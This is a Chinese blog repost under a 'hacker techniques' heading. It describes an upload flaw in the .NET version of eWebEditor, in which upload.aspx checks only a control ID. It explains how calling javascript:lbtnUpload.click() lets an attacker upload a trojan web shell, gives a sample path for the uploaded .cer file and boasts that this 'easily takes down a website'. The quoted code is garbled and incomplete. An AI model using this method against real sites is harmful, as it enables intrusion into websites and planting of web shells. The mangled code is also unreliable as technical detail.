=波波日志 > 黑客技术 > eWebEditor .Net版本漏洞=

[转]eWebEditor .Net版本漏洞

发布日期:2010-04-23
影响版本:ASPX版本
漏洞描述:eWebEditorNet 主要是一个upload.aspx文件存在上传漏洞。

原理:

代码 <form id="post" encType="server">
"uploadfile" style="file" size="uploadfile" runat=
"lbtnUpload" runat=
"JavaScript">
只是简单的对ID进行验证
只要构造javascript:lbtnUpload.click();满足条件
达到上传木马的效果
成功以后查看源代码

代码 a "lbtnUpload" "javascript:__doPostBack('lbtnUpload','')"</>script 'javascript'</>
木马的具体地址为
/eWebEditorNet/UploadFile/200801141044412198.cer
这样就轻松的拿下了一个网站。

http://hi.baidu.com/isbx/blog/item/0de79c16b593225df2de3216.html

类别:黑客技术 作者:转载 日期:2010-05-05 【评论:0】 
 
暂时没有评论!
发表留言
  • *昵称:
  • 头像:
  • 电子邮件: [留下您的邮件,方便管理员回复您。]
  • 个人网站: *验证码:
声明:本网站尊重并保护知识产权,根据《信息网络传播权保护条例》,如果我们转载或引用的作品侵犯了您的权利,请通知我们,我们会及时删除!
Powered by showbo,©2012WEB编程网桂ICP备05005887号 京公网安备1101055090